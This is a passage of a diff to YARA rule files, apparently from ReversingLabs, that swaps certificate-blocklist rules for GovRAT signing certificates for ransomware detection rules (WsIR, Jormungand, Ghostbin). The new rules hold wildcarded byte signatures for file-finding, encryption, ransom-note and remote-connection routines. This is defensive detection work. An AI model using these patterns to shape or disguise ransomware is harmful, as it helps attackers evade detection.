?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F9 89 BD ?? ?? ?? ?? 33 C0 89 + 85 ?? ?? ?? ?? 38 47 ?? 0F 85 ?? ?? ?? ?? 8B 07 8B 08 8D 85 ?? ?? ?? ?? 50 8D 49 ?? + E8 ?? ?? ?? ?? 83 38 ?? 0F 85 ?? ?? ?? ?? 83 7F ?? ?? 74 ?? 8B 07 8B 08 8D 85 ?? ?? + ?? ?? 50 8D 49 ?? E8 ?? ?? ?? ?? 83 38 ?? 0F 84 ?? ?? ?? ?? 8B 07 8D 8D ?? ?? ?? ?? + 8B 30 8D 46 ?? 50 E8 ?? ?? ?? ?? 8D 46 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? + ?? 8B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? + ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 + ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 07 8B + 30 8B 46 ?? 8B 00 85 C0 74 ?? 8D 8D ?? ?? ?? ?? 51 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? + ?? ?? ?? 83 C4 ?? 66 83 38 ?? 75 ?? 8B 46 ?? FF 30 FF 15 ?? ?? ?? ?? 8B 46 ?? 83 C4 + ?? C7 00 ?? ?? ?? ?? EB ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D + 4E ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? C6 45 ?? ?? 81 7F ?? ?? ?? ?? ?? 8B 37 8B 36 75 ?? 68 ?? ?? ?? ?? FF 15 + ?? ?? ?? ?? 8B 46 ?? 89 85 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 45 ?? ?? 6A ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 8D 85 ?? ?? ?? ?? 8D 4F ?? 50 E8 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Syngenta" and (pe.signatures[i].serial=="00:e8:cc:18:cf:10:0b:6b:27:44:3e:f2:63:19:39:87:34" or pe.signatures[i].serial=="e8:cc:18:cf:10:0b:6b:27:44:3e:f2:63:19:39:87:34") and 1404172799<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_62Af28A7657Ba8Ab10Fa8E2D47250C69 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Wsir : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing GovRAT malware." + description = "Yara rule that detects WsIR ransomware." author = "ReversingLabs" - id = "cba20a1b-5d24-5a1f-8f2f-8c47add846d6" - date = "2023-11-08" - modified = "2023-11-08" + id = "cb4ab736-9421-5b92-b4a5-c5db0b61725a" + date = "2022-08-02" + modified = "2022-08-02" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1454-L1470" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c3c034cb4e2c65e2269fbfd9c045eb294badde60389ae62ed694ea4d61c5eb35" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.WsIR.yara#L1-L73" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c22c01f93945c7721ebfe5e7a09c3bf2b9d0ad95740bc0a76b4e61741f61d82c" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "WsIR" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53 + 55 8B E9 8D 4C 24 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 4C 24 ?? C7 84 24 ?? ?? ?? ?? ?? + ?? ?? ?? 8B 41 ?? 85 C0 74 ?? 8D 54 24 ?? 6A ?? 52 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 00 + 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 85 C0 0F 95 C3 E8 ?? ?? ?? ?? + 84 DB 74 ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? E8 + ?? ?? ?? ?? 8B 4C 24 ?? 8D 44 24 ?? 50 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 75 + ?? 8D 4C 24 ?? 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 56 8B B4 24 ?? ?? + ?? ?? 57 8B 3D ?? ?? ?? ?? BB ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 8D 54 24 ?? 68 ?? ?? + ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 45 ?? 8D 54 24 ?? 52 6A ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 50 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? + ?? ?? ?? ?? 89 4C 24 ?? 89 5C 24 ?? FF D7 8B 54 24 ?? 8D 4C 24 ?? 51 52 FF 15 ?? ?? + ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 56 6A ?? 68 + ?? ?? ?? ?? 51 FF D7 8D 4C 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F + 5E 8B 8C 24 ?? ?? ?? ?? 5D 5B 64 89 0D ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2 + } + $encrypt_files = { + FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? + ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? + ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 + C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B + 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? + 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 + ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? + E9 + } + $exec_proc = { + 52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 1D ?? ?? + ?? ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF D3 8D 4C 24 ?? 8D 54 24 ?? 51 52 68 ?? ?? ?? + ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 E8 ?? + ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B + F0 83 C4 ?? 85 F6 75 ?? 8D 54 24 ?? 52 FF 15 ?? ?? ?? ?? 8D 74 04 ?? EB ?? 8D 57 ?? + 8D 4C 24 ?? 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 85 C9 0F 85 ?? ?? ?? ?? 8D 4C 24 + ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 EB ?? C6 06 ?? 68 ?? ?? ?? + ?? 56 FF D3 8B 44 24 ?? 50 56 FF D3 8D 4C 24 ?? 55 51 FF 15 ?? ?? ?? ?? 8B F0 33 D2 + 83 FE ?? 0F 9F C2 8D 4C 24 ?? 8B F2 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? + 5D 8B C6 5B 8B 8C 24 ?? ?? ?? ?? 5F 5E 64 89 0D ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AFINA Fintek" and pe.signatures[i].serial=="62:af:28:a7:65:7b:a8:ab:10:fa:8e:2d:47:25:0c:69" and 1404172799<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ($exec_proc) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_04C8Eca7243208A110Dea926C7Ad89Ce : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Jormungand : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing GovRAT malware." + description = "Yara rule that detects Jormungand ransomware." author = "ReversingLabs" - id = "484d0aa6-0447-5e60-946b-89b01a5e43dd" - date = "2023-11-08" - modified = "2023-11-08" + id = "418c3d9f-2338-593f-a8ec-a1e25afa50d4" + date = "2021-10-22" + modified = "2021-10-22" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1472-L1488" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0012436e83704397026a8b2e500e5d61915e0f4c8ad4100176e200a975562e8f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Jormungand.yara#L1-L135" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "049eb4533b37d8d72e50dd1e803a897758386643770d47b3e7690f58e44d5236" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Jormungand" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Open Source Developer, SINGH ADITYA" and pe.signatures[i].serial=="04:c8:ec:a7:24:32:08:a1:10:de:a9:26:c7:ad:89:ce" and 1404172799<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_157C3A4A6Bcf35Cf8453E6B6C0072E1D : INFO FILE -{ - meta: - description = "Certificate used for digitally signing GovRAT malware." - author = "ReversingLabs" - id = "4bae3fb2-7e30-598e-8708-b985697bf63a" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1490-L1506" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2a68051ab6d0b967f08e44d91b9f13d75587ea0f16e2a5536ccf5898445e1a58" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $drop_ransom_note = { + 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 8D 44 24 ?? 3B 41 ?? 0F 86 ?? ?? ?? ?? 81 EC + ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? + ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 + 84 24 ?? ?? ?? ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 54 24 ?? 89 14 24 8B 94 24 ?? ?? ?? ?? + 89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? + 8B 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 1C 24 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 89 44 24 + ?? 89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 8B 4C 24 + ?? 89 4C 24 ?? 8B 54 24 ?? 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 89 + 5C 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 8D 1D ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ?? + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 04 24 89 4C 24 ?? C7 44 24 ?? + ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? + 8D 4C 24 ?? 89 0C 24 8B 8C 24 ?? ?? ?? ?? 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 4C + 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 44 24 ?? 89 4C 24 ?? 8D + 44 24 ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? + ?? ?? 8B 44 24 ?? 8B 4C 24 ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? E8 ?? ?? + ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 1C 24 89 44 24 ?? + 89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? + 81 C4 ?? ?? ?? ?? C3 E8 + } + $encrypt_files_aes = { + 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 8B 44 24 + ?? 89 04 24 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 + ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 D2 74 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 + ?? ?? ?? ?? ?? 89 54 24 ?? 89 5C 24 ?? 83 C4 ?? C3 89 44 24 ?? 89 4C 24 ?? 8B 50 ?? + 89 0C 24 FF D2 8B 44 24 ?? 8B 4C 24 ?? 89 0C 24 8B 4C 24 ?? 89 4C 24 ?? 8B 4C 24 ?? + 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 + ?? 8B 54 24 ?? 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 8D 1D ?? ?? ?? ?? 89 5C 24 ?? C7 44 + 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 89 + 1C 24 8B 5C 24 ?? 89 5C 24 ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B + 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 8B 54 24 ?? + 89 54 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 + ?? 8B 54 24 ?? 89 54 24 ?? 8B 5C 24 ?? 8B 5B ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? + 8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ?? + 89 2C 24 FF D3 8B 05 ?? ?? ?? ?? 89 04 24 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 + 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 44 24 ?? 89 + 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 C4 ?? C3 E8 + } + $encrypt_files_rsa = { + 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? C7 04 24 + ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B + 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 89 14 24 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B + 44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 48 ?? 8B 50 ?? 8B 40 ?? 89 0C 24 89 54 24 ?? 89 + 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 D2 75 ?? + 8D 15 ?? ?? ?? ?? 39 D0 0F 85 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 04 + 24 89 54 24 ?? 89 4C 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B 44 24 + ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C + 24 ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 89 5C 24 ?? 89 6C 24 ?? 83 C4 ?? C3 C7 44 + 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 5C + 24 ?? 83 C4 ?? C3 8D 05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 44 24 ?? C7 40 ?? ?? + ?? ?? ?? 8B 0D ?? ?? ?? ?? 85 C9 75 ?? 8D 0D ?? ?? ?? ?? 89 08 C7 44 24 ?? ?? ?? ?? + ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 0D ?? ?? ?? ?? 89 4C 24 ?? 89 + 44 24 ?? 83 C4 ?? C3 89 44 24 ?? 89 04 24 8D 0D ?? ?? ?? ?? 89 4C 24 ?? E8 ?? ?? ?? + ?? 8B 44 24 ?? EB ?? 89 04 24 89 54 24 ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? + ?? 0F 0B + } + $find_files = { + 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? C7 44 24 + ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? + ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8D 05 ?? ?? + ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 44 24 ?? 89 04 24 8B 44 24 ?? 89 44 + 24 ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? + ?? 8B 15 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? + ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 90 E8 ?? ?? ?? ?? 83 + C4 ?? C3 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 E8 + } + $remote_connection_p1 = { + 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? C7 04 24 + ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D + 05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? C7 40 ?? ?? ?? ?? ?? + 8D 0D ?? ?? ?? ?? 89 0C 24 E8 ?? ?? ?? ?? 8B 44 24 ?? C6 40 ?? ?? 8B 0D ?? ?? ?? ?? + 8B 54 24 ?? 8D 5A ?? 85 C9 0F 85 ?? ?? ?? ?? 89 42 ?? 8D 05 ?? ?? ?? ?? 89 04 24 E8 + ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8D 0D + ?? ?? ?? ?? 89 08 8B 0D ?? ?? ?? ?? 8D 50 ?? 85 C9 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? 89 + 48 ?? C7 04 24 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B + 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 + ?? ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 + 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? + 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 48 ?? 8B 0D ?? ?? ?? ?? 85 C9 0F 85 ?? ?? ?? + ?? 8B 4C 24 ?? 89 08 C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 + } + $remote_connection_p2 = { + C7 04 24 ?? ?? ?? ?? 8D 0D ?? ?? ?? ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 4C 24 + ?? 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 4C + 24 ?? 89 44 24 ?? 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? 8D 05 ?? ?? ?? + ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C + 24 ?? 8B 54 24 ?? 89 0C 24 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 44 24 + ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 89 0C + 24 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 75 ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 + 8B 48 ?? 84 01 8B 40 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 41 ?? 89 44 24 ?? E8 ?? + ?? ?? ?? 85 C0 75 ?? EB ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 89 04 24 8B 4C 24 ?? 89 4C + 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? E9 ?? ?? ?? ?? 89 14 24 8B 44 24 ?? 89 44 24 ?? E8 + ?? ?? ?? ?? E9 ?? ?? ?? ?? 89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 90 E8 + ?? ?? ?? ?? 83 C4 ?? C3 E8 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Favorite-III" and pe.signatures[i].serial=="15:7c:3a:4a:6b:cf:35:cf:84:53:e6:b6:c0:07:2e:1d" and 1404172799<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_*)) and ( all of ($remote_connection_p*)) and ($drop_ransom_note) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_04422F12037Bc2032521Dbb6Ae02Ea0E : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Ghostbin : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing GovRAT malware." + description = "Yara rule that detects Ghostbin ransomware." author = "ReversingLabs" - id = "0dc659e8-1f3b-5130-a776-dd9e4141f5f3" - date = "2023-11-08" - modified = "2023-11-08" + id = "4d576854-7a30-527d-9a7a-f22018183540" + date = "2021-09-06" + modified = "2021-09-06" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1508-L1524" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "381d749d24121d6634656fd33adcda5c3e500ee77a6333f525f351a2ee589e2c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.Ghostbin.yara#L1-L61" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3881e1c83ac2a31fdd8a081d3e6e6ea759771dbc183c3af9528930619bcddf9e" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Ghostbin" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Open Source Developer, Muhammad Lee" and pe.signatures[i].serial=="04:42:2f:12:03:7b:c2:03:25:21:db:b6:ae:02:ea:0e" and 1404172799<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_65Eae6C98111Dc40Bf4F962Bf27227F2 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing GovRAT malware." - author = "ReversingLabs" - id = "34275efd-b941-56f5-8e1b-30a43f1936e2" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1526-L1542" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "20c0f4e9783586e68ff363fe6a72398f6ea27aef5d25f98872d1203ce1a0c9bd" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + 